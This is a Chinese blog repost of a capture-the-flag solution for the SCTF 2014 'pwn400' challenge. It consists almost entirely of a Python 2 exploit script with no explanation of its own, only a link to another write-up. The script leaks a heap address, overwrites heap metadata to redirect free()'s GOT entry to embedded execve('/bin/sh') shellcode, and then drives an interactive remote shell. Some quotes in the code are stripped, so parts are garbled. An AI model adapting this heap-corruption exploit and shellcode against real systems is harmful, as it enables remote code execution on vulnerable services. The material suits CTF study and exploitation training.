码迷,mamicode.com
首页 > 其他好文 > 详细

sctf pwn400

时间:2015-04-06 01:00:12      阅读:408      评论:0      收藏:0      [点我收藏+]

标签:

  这个题目在这个链接中分析得很透彻,不再多余地写了。http://bruce30262.logdown.com/posts/245613-sctf-2014-pwn400

  exploit:

from socket import *
import struct
import time

shellcode = "\x90\x90\x90\x90\x90\x90"+"\xeb\x08"+"AAAA"+"\x90"*10+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x59\x50\x5a\xb0\x0b\xcd\x80"
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.200.7", 10001))

time.sleep(1)
print sock.recv(1024)
#new two note: 2, 1
for i in xrange(2):
     sock.send(1\n)
     time.sleep(1)
     sock.recv(1024)
     sock.send(str(i+1) + \n)
     time.sleep(1)
     sock.recv(1024)
     sock.send(str(i+1) + \n)
     time.sleep(1)
     sock.recv(1024)
     sock.send(str(i+1) + \n)
     time.sleep(1)
     sock.recv(1024)
#new the third note: 3
sock.send(1\n)
time.sleep(1)
sock.recv(1024)
sock.send(3\n)
time.sleep(1)
sock.recv(1024)
sock.send(3\n)
time.sleep(1)
sock.recv(1024)
time.sleep(1)
#store shellcode in note 3
sock.send(shellcode+"\n")

#get the note 1‘s address
sock.send(3\n)
time.sleep(1)
print sock.recv(100)
sock.send(1\n)
time.sleep(1)
note1_addr = sock.recv(2048)
while note1_addr.find(location:) == -1:
     note1_addr += sock.recv(2048)
print note1_addr
note1_addr = note1_addr[note1_addr.find(location:) + 11:]
note1_addr = note1_addr[:note1_addr.find(\n)]
addr1 = int(note1_addr, 16)
print addr1
#note 2‘s address
addr2 = addr1 + 0x170
#note 3‘s address
addr3 = addr2 + 0x170
#shellcode‘s address
addr_shellcode = struct.pack("<I", addr3 + 0x6c)
#free()‘s Got: 0x0804a450
exploit = "A"*256+"BBBB"+struct.pack("<I",addr2)+addr_shellcode+"\x4c\xa4\x04\x08"

#edit note 1
sock.send("4\n")
time.sleep(1)
print sock.recv(1024)
sock.send("1\n")
time.sleep(1)
print sock.recv(1024)
sock.send(exploit+"\n")
time.sleep(1)
print sock.recv(1024)

#delete node 2
sock.send("5\n")
time.sleep(1)
sock.recv(1024)
time.sleep(1)
sock.send(hex(addr2)[2:10]+\n)
time.sleep(1)
sock.recv(1024)

while True:
    sock.send(raw_input($ ) + \n)
    time.sleep(1)
    temp = sock.recv(2048)
    print temp

 

sctf pwn400

标签:

原文地址:http://www.cnblogs.com/wangaohui/p/4395133.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!